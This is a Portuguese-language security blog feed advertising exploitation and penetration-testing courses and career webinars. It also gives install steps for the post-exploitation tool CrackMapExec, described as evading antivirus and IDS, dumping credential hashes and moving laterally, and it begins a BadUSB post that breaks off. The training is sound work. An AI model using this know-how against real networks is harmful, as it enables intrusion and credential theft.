tag:blogger.com,1999:blog-34660628418686118062024-03-13T11:04:29.346-03:00HackProofing LabsLuiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.comBlogger233125tag:blogger.com,1999:blog-3466062841868611806.post-67385484889715236912018-03-06T17:44:00.000-03:002018-05-29T08:31:31.699-03:00Curso de Exploitation - 2018<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px; text-align: justify;">
No dia 05<b> de Junho de 2018</b> teremos nossa primeira turma do curso "<b>Exploitation</b>", que há tempos vem sendo planejado e enfim se torna uma realidade.</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px; text-align: justify;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px; text-align: justify;">
O curso já começa com 23 inscritos previamente, que estavam no aguardo dessa primeira turma, então as vagas restantes são bem poucas.</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px; text-align: justify;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px; text-align: justify;">
Abaixo você pode ver o resumo do conteúdo programática, já tendo em mente que esse é um curso avançado, sendo a sequência natural do curso "Pentest Avançado & Introdução a Exploitation", e o foco é seguir adiante no processo de construção de exploits, mas dessa vez se aprofundando mais ainda nos conceitos de organização de memória e como burlar as principais proteções existentes nos softwares e sistemas operacionais atuais.</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px; text-align: justify;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px; text-align: justify;">
Ementa resumida:</div>
<div style="background-color: white; font-family: arial, sans-serif; font-size: 12.8px;">
<ul style="color: #222222;">
<li style="text-align: justify;">Introdução a organização da memória do S.O. Linux</li>
<li style="text-align: justify;">Dinâmica da memória do Linux</li>
<li style="text-align: justify;">Introdução aos shellcodes</li>
<li style="text-align: justify;">Return Oriented Programming (ROP)</li>
<li style="text-align: justify;">Burlando Stack Canaries</li>
<li style="text-align: justify;">Address Space Layout Randomization (ASLR)</li>
<li style="text-align: justify;">Usando força bruta contra ASLR</li>
<li style="text-align: justify;">Introdução a Windows Exploitation</li>
<li style="text-align: justify;">Proteções de S.O. Windows e Compile-Time Controls</li>
<li style="text-align: justify;">Stack Overflow básico</li>
<li style="text-align: justify;">SEH Overwrites</li>
<li style="text-align: justify;">Burlando Hardware DEP com ROP</li>
<li style="text-align: justify;">Construindo um módulo do Metasploit</li>
<li style="text-align: justify;">Shellcode para Windows</li>
</ul>
<div style="color: #222222; text-align: justify;">
<b>Carga horária: </b>no mínimo 32h (podem haver aulas extras, aumentando a carga horária)</div>
<div style="color: #222222; text-align: justify;">
<b>Pré-requisito:</b> ter participado do curso <span style="font-size: 12.8px;">"Pentest Avançado & Introdução a Exploitation" ou conhecimento equivalente.</span></div>
<div style="color: #222222; text-align: justify;">
<b>Aulas:</b> terças-feiras a partir das 22h</div>
<div style="text-align: justify;">
<b style="color: #222222;">Investimento:</b> <b><span style="color: red;">3x R$365,00</span></b><span style="color: #222222;"> (pelo Paypal com cartão de crédito) ou R$997,00 via boleto ou depósito em conta.</span><br />
<span style="color: #222222;"><br /></span>
<span style="color: #222222;"></span><br />
<div style="color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Inscrição: </b>Quem tiver interesse no curso, por favor, acesse o link <a href="http://bit.ly/ZkbwEE" style="color: #015782; text-decoration-line: none;">http://bit.ly/ZkbwEE</a> e faça sua inscrição no curso <b>"Exploitation"</b>. Para pagamentos via PagSeguro, Paypal ou BCash, após preencher o formulário, aguarde o e-mail com o link de cobrança.</span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</div>
<div style="color: #222222; text-align: justify;">
<br /></div>
<div style="color: #222222; text-align: justify;">
<b>PROMOÇÃO: </b>caso você não tenha feito curso <span style="font-size: 12.8px;">"Pentest Avançado & Introdução a Exploitation", mas quer participar dessa turma de "Exploitation", pode adquirir o conteúdo do "Pentest Avançado" fazendo parte da Academia Hackproofing Labs inscrevendo-se aqui: <a href="https://www.hackproofinglabs.com.br/academiahpl/">https://www.hackproofinglabs.com.br/academiahpl/</a></span></div>
<div style="color: #222222; text-align: justify;">
<br /></div>
<div style="color: #222222; text-align: justify;">
<br /></div>
</div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-49200441866053078802017-05-28T21:17:00.001-03:002017-05-28T21:17:59.699-03:00WEBINAR ao vivo sobre Carreira em Segurança da Informação<div class="separator" style="clear: both; text-align: center;">
<a href="https://goo.gl/forms/LvSlEgkzHdqzXZBp1" target="_blank"><img border="0" data-original-height="299" data-original-width="446" height="267" src="https://4.bp.blogspot.com/-ZTcBrZT221w/WStiWMdY9_I/AAAAAAAADzY/-9TJkDP2JkMmMyAvA2zqKRf2VvxQx1wvQCLcB/s400/webinar_carreira.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Eu, da mesma forma que a maioria dos profissionais de segurança da informação, não comecei minha carreira diretamente nessa área. Sei também o quanto foi difícil conseguir a migração de uma área para a outra, e quão poucas informações conseguia obter sobre esse processo naquela época.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Hoje em dia ainda temos certa dificuldade em conseguir orientação e informações sobre como realizar essa migração de uma área para a outra, quais as possibilidades que existem na carreira de um profissional de SI, quais as áreas de atuação, como ganhar experiência e muitas outras dúvidas que sei que aqueles que ainda não atuam na área, ou são inciantes, tem. Até mesmo profissionais experientes podem ter suas dúvidas sobre a atuação na área de SI, gerando dificuldades em planejar o futuro de sua carreira e os passos para crescer cada vez mais.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
O objetivo desse webinar, é esclarecer o máximo possível esse assunto, tirando dúvidas, respondendo perguntas e falando um pouco sobre a carreira nessa área cada vez mais valorizada em todo o mundo.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Só para saber, hoje, dia 28 de maio de 2017, realizei algumas buscas por vagas no site "Indeed", em três diferentes países, buscando por profissionais com algumas certificações. Vejam os resultados abaixo:</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
CISSP: Canada = 619 vagas / Austrália = 121 vagas / EUA = 11.800 vagas</div>
<div class="separator" style="clear: both; text-align: justify;">
CEH = Canada = 49 vagas / Austrália = 12 vagas / EUA = 2.519 vagas</div>
<div class="separator" style="clear: both; text-align: justify;">
CISM: Canada = 283 vagas / Austrália = 68 vagas / EUA = 3.674 vagas</div>
<div class="separator" style="clear: both; text-align: justify;">
ISO 27001: Canada = 69 vagas / Austrália = 30 vagas / EUA = 1.078 vagas</div>
<div class="separator" style="clear: both; text-align: justify;">
OSCP: Canada = 36 vagas / Austrália = 9 vagas / EUA = 553 vagas</div>
<div class="separator" style="clear: both; text-align: justify;">
OSCE: Canada = 36 vagas / Austrália = 15 vagas / EUA = 212 vagas</div>
<div class="separator" style="clear: both; text-align: justify;">
GPEN: Canada = 20 vagas / Austrália = 6 vagas / EUA = 480 vagas</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Portanto, até mesmo para aqueles profissionais que planejam sair do Brasil, para consolidar sua carreira com uma experiência internacional, é muito bom saber que tem muita vaga por aí. Obviamente que os números acima representam apenas uma pequena porcentagem daquilo que realmente existe.</div>
<br />
Então, se quiser algumas dicas sobre como atuar na área de Segurança da Informação, planejar sua carreira, ou migrar de uma área para outra, inscreva-se nesse webinar!<br />
<br />
<div style="text-align: center;">
<a href="https://goo.gl/forms/LvSlEgkzHdqzXZBp1" target="_blank">Clique aqui para preencher o formulário de inscrição!</a></div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-55889236796933875102017-05-06T18:21:00.001-03:002017-05-06T18:29:08.958-03:00WEBINAR ao vivo sobre certificações na área de Segurança<div class="separator" style="clear: both; text-align: center;">
<a href="https://goo.gl/forms/LvSlEgkzHdqzXZBp1" target="_blank"><img alt=" Inscreva-se já!" border="0" height="267" src="https://3.bp.blogspot.com/-oMpQPygEJls/WQ4-CDgl2QI/AAAAAAAADxY/tt4iiwoJsIYuS7ftRSWaUWNRYKxpFOoYACLcB/s400/webinar_certifica%25C3%25A7%25C3%25B5es.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Sabemos que as certificações são valiosas e um grande diferencial para os profissionais de segurança da informação. No entanto, falta pouca informação sobre qual o cainho das pedras para conquistá-las e quais são as mais importantes dependendo da área em que você pretende atuar. É pensando nisso que agendamos esse webinar ao vivo no dia 17/05/2017 às 23h, para explicar a importância delas no mercado, quais tem maior visibilidade dependendo da área e o nível de dificuldade de algumas delas.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Luiz Vieira será o apresentador desse webinar e explicará para você qual a importância dessas certificações no mercado, tanto para profissionais experientes, que ainda tem dúvidas sobre qual certificação é mais importante, quanto para aqueles que ainda desejam atuar na área de segurança da informação!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Inscreva-se já, <a href="https://goo.gl/forms/LvSlEgkzHdqzXZBp1" target="_blank">através desse link</a>, pois são poucas as vagas disponíveis!</div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com2tag:blogger.com,1999:blog-3466062841868611806.post-14778195899177952922017-04-12T14:53:00.000-03:002017-04-12T14:53:09.547-03:00CrackMapExec - um canivete suíço para pentest em redes Windows com Active DirectoryCrackMapExec, ou simplesmente CME, é uma ferramenta focada para uso de pentesters em ambientes Windows/Active Directory. Com esse foco em mente, muitas das funcionalidades dessa ferramenta possuem características "stealth", para burlar proteções como IDS, IPS, antivírus e outros sistemas de detecção de ameaças em endpoints.<br />
<br />
Essa ferramenta foi desenvolvida para ter diversas funcionalidades existentes baseadas em outras ferramentas, como psexec, Mimikatz e etc. No entanto, ela tem diversos pontos positivos se comparada a essas outras ferramentas, por exemplo:<br />
<br />
<ul>
<li>Puramente em Python;</li>
<li>Uso de threads;</li>
<li>Uso apenas de chamadas de API do Windows para descoberta de sessões, usuários, dump de hashs SAM e etc;</li>
<li>Não é feito upload de nenhum binário para extração de credenciais, injeção de shellcode e etc.</li>
</ul>
<br />
Essa ferramenta ainda conta com uma base de dados que armazena e correlaciona credenciais que tenham sido extraídas das máquinas comprometidas.<br />
<br />
Para instalá-la, é importante satisfazer algumas poucas dependências em seu sistema operacional, instalando os seguintes pacotes:<br />
<br />
<pre style="background-color: #f6f8fa; border-radius: 3px; box-sizing: border-box; color: #24292e; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; font-stretch: normal; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">#apt-get install -y libssl-dev libffi-dev python-dev build-essential</code></pre>
E para baixar e o instalar a versão mais recente da ferramenta, basta executar os seguintes comandos, para baixar do github e fazer a instalação:<br />
<pre style="background-color: #f6f8fa; border-radius: 3px; box-sizing: border-box; color: #24292e; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; font-stretch: normal; line-height: 1.45; margin-bottom: 16px; overflow: auto; padding: 16px; word-wrap: normal;"><code style="background: transparent; border-radius: 3px; border: 0px; box-sizing: border-box; display: inline; font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace; font-size: 13.6px; line-height: inherit; margin: 0px; overflow: visible; padding: 0px; word-break: normal; word-wrap: normal;">#~ git clone https://github.com/byt3bl33d3r/CrackMapExec
#- cd CrackMapExec && git submodule init && git submodule update --recursive
#~ python setup.py install</code></pre>
Para ter uma noção dos módulo que a aplicação tem, basta executar o seguinte comando:<br />
<blockquote class="tr_bq">
#crackmapexec -L</blockquote>
<a href="https://github.com/byt3bl33d3r/CrackMapExec" target="_blank">Nesse link</a> você consegue acesso ao repositório do GitHub, e de quebra lá também pode acessar a <a href="https://github.com/byt3bl33d3r/CrackMapExec/wiki" target="_blank">wiki</a>, onde há todos os comandos e formas de usar a ferramenta e seus módulos, incluindo diferentes formas de executar comandos no Windows através do CrackMapExec.<br />
<br />
É uma ferramenta que realmente vale a pena entender seu funcionamento, para facilitar o processo de pós exploração, movimentação lateral e escalada de privilégios em sistemas Windows com grandes redes utilizando o Active Directory.Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-52439487728062267642017-01-23T11:02:00.001-02:002017-03-26T15:10:48.889-03:00Teste de Invasão em Redes e Aplicações WEB<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Descrição:</b></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Esse treinamento é a união de dois treinamentos em um só: Teste de Invasão em Redes e Teste de Invasão em Aplicações WEB. A ideia surgiu da necessidade de criar um curso mais completo, unificado, e que fosse possível dar prosseguimento sem quebrar o ritmo.</span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">O treinamento completo terá 60h de duração, totalmente prático, com execução de técnicas básicas à avançadas, chegando a criação de um exploit do zero, para exploração remota de um servidor para execução de um shellcode escolhido.</span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">O aluno terá à sua disposição máquinas virtuais locais e na nuvem para execução dos exercícios, ao vivo, seguindo a tela compartilhada do instrutor, durante a aula.</span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Instrutor:</b></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">O instrutor do curso possui anos de experiência em testes de invasão, tanto em redes, quanto aplicações web, redes wireless e review code. E é uma oportunidade de aprender com quem convive com as necessidades e situações reais do mercado atual, com clientes de grande porte como multinacionais de diversas áreas (Petróleo e Gás, Telecomunicações, Transportes, Operadoras de Cartão de Crédito, Bancos, Instituições Militares e Órgãos Públicos).</span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Quem deve participar:</b></span></div>
<div style="text-align: justify;">
</div>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Profissionais de TI, que tenham interesse na área de segurança;</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Profissionais de segurança que tenham interesse em teste de invasão (pentesters, peritos forenses e etc);</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Desenvolvedores que queiram aprender como funcionam as vulnerabilidades e como mitigá-las.</span></li>
</ul>
<br />
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Pré-requisitos:</b></span></div>
<div style="text-align: justify;">
</div>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Conhecimento básico de Windows</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Conhecimento básico de Linux</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Criação de máquinas virtuais com VirtualBox ou VMWare</span></li>
</ul>
<br />
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Material:</b></span></div>
<div style="text-align: justify;">
</div>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Slides em pdf</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Apostila</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Vídeo de todas as aulas gravadas ao longo do treinamento</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Máquinas Virtuais específicas</span></li>
</ul>
<br />
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Carga horária: 60h</b></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Início: <span style="color: red;">17 de Abril de 2017 (nova data)</span></b></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Horário:</b> segundas e terças-feiras, das 22h às 24h</span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Investimento: <span style="color: red;">R$ 1.490,00</span></b></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Inscrição: </b>Quem tiver interesse no curso, por favor, acesse o link <a href="http://bit.ly/ZkbwEE">http://bit.ly/ZkbwEE</a> e faça sua inscrição no curso <b>"Teste de Invasão em Redes e Aplicações WEB"</b>. Para pagamentos via PagSeguro, Paypal ou BCash, após preencher o formulário, aguarde o e-mail com o link de cobrança.</span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><i><b>Observação 1: </b>para pagamentos via depósito em conta, com<span style="color: red;"> <b>5% de desconto</b></span>, entre em contato com luizwt at gmail.com.</i></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><i><b><br /></b></i></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><i><b>Observação 2: <span style="color: red;">desconto de 10%</span></b> para <span style="color: red;"><b>ex-alunos</b></span> via Paypal ou BCash, ou <span style="color: red;"><b>20% via depósito em conta</b></span>.</i></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Ementa completa:</b></span></div>
<div style="text-align: justify;">
</div>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Introdução à Segurança da Informação</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Introdução ao Teste de Invasão e Ética Hacker</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Escrita de Relatório</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Google Hacking</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Varreduras ativas, passivas e furtivas de rede</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Enumeração de informações e serviços</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Definindo vetores de ataque</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Ignorando Proteções</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Técnicas de Força Bruta</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Elevação de Privilégios Locais</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Testando o sistema</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Técnicas de Sniffing</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Ataques a Servidores WEB</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Ataques a Redes Sem Fio</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Fuzzing & Exploits de Buffer Overflow</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Apagando Rastros</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Metasploit Framework</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">WarGames</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Ciclo de Desenvolvimento de Software Seguro</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">OWASP</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Arquiteturas e tecnologias de Aplicações WEB</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Cifras Simétricas</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Cifras Assimétricas</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Funções de hash criptográficas</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Assinaturas Digitais</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Certificados Digitais</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Protocolos SSL e TLS</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Protocolos HTTP e HTTPS</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Requisição HTTP</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Autenticação HTTP</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Esquemas de Codificação</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Codificação de URL</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Codificação HTML</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Ferramentas Básicas para pentest WEB</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Navegadores WEB</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Proxies de interceptação</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Web spiders</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Fuzzers</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Levantamento dos métodos suportados</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Mapeamento</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Identificação dos pontos de entrada de informação</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Exploração de Controles Client-Side</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Detecção de hosts virtuais</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Descoberta de arquivos e diretórios</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Cópia das páginas e recursos da aplicação</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Identificação dos pontos de entrada de informação</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Descoberta de vulnerabilidades e exploração</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Evasão de restrições em campos HTML</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Evasão de validação de Javascript</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Exploração de campo oculto</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Teste de Mecanismos de Autenticação</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Tecnologias de autenticação empregadas em aplicações web</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Descoberta de vulnerabilidade e exploração</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Uso de informações obtidas nas fases de reconhecimento e mapeamento</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Usuário e senha padronizados</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Enumeração de identificadores de usuários</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Mecanismo vulnerável de recuperação de senhas</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Funcionalidade "Lembrar usuário"</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Transporte inseguro de credenciais de acesso</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Mecanismo vulnerável de troca de senhas</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Autenticação com múltiplos fatores</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Avaliação dos aspectos de autenticação</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Arquivos contendo credenciais de acesso</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Pistas no código</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Teste de Gerenciamento de Sessões</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Descoberta de vulnerabilidades e exploração</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Identificares de sessão previsíveis</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Domínio de identificadores com baixa cardinalidade</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Transmissão em claro de identificadores de sessão</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Manipulação de identificador de sessão por meio de scripts</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Atributos de cookies</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Sequestro de sessão</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Session Fixation</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Encerramento vulnerável de sessão</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Sessões simultâneas de um mesmo usuário</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Cross-site request Forgery</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Clickjacking</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">OWASP Top 10 </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Resumo de cada Vulnerabilidade</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Explorações e Desafios práticos de cada vulnerabilidade do OWASP Top 10</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Defesa</span></li>
</ul>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com2tag:blogger.com,1999:blog-3466062841868611806.post-28630416327636730662016-12-09T16:17:00.004-02:002016-12-09T16:17:40.401-02:00BadUSB: comprometendo máquinas Windows através da porta USB<span style="text-align: justify;">Algum tempo atrás, uma nova ameaça foi descoberta, chamada de BadUSB, que veio na forma de hardware... especificamente na forma de USB.</span><br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Para aqueles não familiarizados com estes dispositivos o nome diz tudo: BadUSB, porque estes USBs não são utilizados como armazenamento, mas se passam por outro dispositivo, como: teclados, mouses... que executarão um código pré-programados pelo atacante. E este falsa USB quando conectado a um computador pode executar comandos no terminal, instalar um backdoor para acesso posterior desse computador, roubar credenciais e muitos mais.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Tudo isso é porque os USBs falsos quando conectados a uma máquina executam outro firmware que não é a memória USB normal, comportando-se como qualquer outro tipo de dispositivo e é capaz de executar qualquer tipo ação na máquina à qual ele está conectado sem que o usuário em questão perceba algo.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Existem vários dispositivos no mercado com estas características, mas o mais adequado para o que estou falando é o <a href="https://hakshop.com/products/usb-rubber-ducky-deluxe" target="_blank">RubberDucky</a>, um dispositivo criado pela Hak5.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
O RubberDucky funciona como um teclado e executa o que temos armazenados no seu micro SD só de conectarmos ele a outro dispositivo.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
O preço deste USB é de US $ 44,99 mais custos de transporte, que são mais de 39.50 $ (para o Rio de Janeiro). Um dispositivo um pouco caro...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Então, o que você diria se pudesse obter o mesmo por cerca de metade do preço do RubberDucky? Sim, podemos criar nosso próprio Rubber Ducky pela metade do preço, tudo graças ao Teensy que funciona com Arduino .</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Para montar precisamo: uma placa Teensy, ter um Arduino instalado e um cabo USB.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
